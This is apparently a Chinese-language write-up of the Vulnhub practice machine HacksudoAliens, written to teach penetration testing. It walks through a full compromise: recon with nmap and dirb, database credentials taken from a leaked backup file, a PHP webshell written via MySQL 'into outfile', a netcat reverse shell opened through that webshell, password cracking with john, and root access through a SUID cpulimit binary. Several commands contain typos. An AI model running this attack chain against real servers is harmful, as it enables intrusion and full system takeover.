Vulnhub介绍:
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。
靶机下载:
https://download.vulnhub.com/hacksudo/HacksudoAliens.zip
1.nmap -sS -A -p- -n +靶机ip
2.发现有9000端口访问它发现是phpmyadmin页面
3.dirb http://+靶机ip
发现有backup访问它
下载mysq.bak
4.查看它
cat mysql.bak
发现数据库的用户名和密码
user vishal
password hacksudo
我们来尝试登录phpmyadmin发现可以登录
5.我们点击SQL执行sql语句,看是否设置了secure_file_priv
show global variables like ‘%sercure%’;
我们发现secure_file_priv的值是空的,这样我们就可以利用一句话木马了
6.select “<?php system($_GET[‘cmd’]);?>” into outfile “/var/www/html/webshell555.php”
上传一句话木马后在网页访问
可以查看一下我们要登录的用户,网址后面加上?cmd=id
7.开启监听
nc -nlvp 4444
利用网站后台脚本使用浏览器访问
靶机ip/webshell555.php?cmd=nc%20+本机ip%5555%20-e%20/bin/bash
靶机ip/webshell555.php?cmd=nc +本机ip 5555 -e /bin/bash
8.
返回终端查找
find / -perm -4000 2>/dev/nulll
发现有date可以利用它提权
发现用户hacksudo的密码,但它是加密的
把密码拷下来写入一个文件
然后我们可以用john解密
密码为 aliens
9.切换到用户hacksudo
继续查看是否有权限的文件
find / -perm -4000 2>/dev/null
使用cpulimit来进行suid提权的方法
先进入/home/hacksudo/Downloads
./cpulimit -l 100 -f -- /bin/sh -p
whoami
cd /root
ls
cat root.txt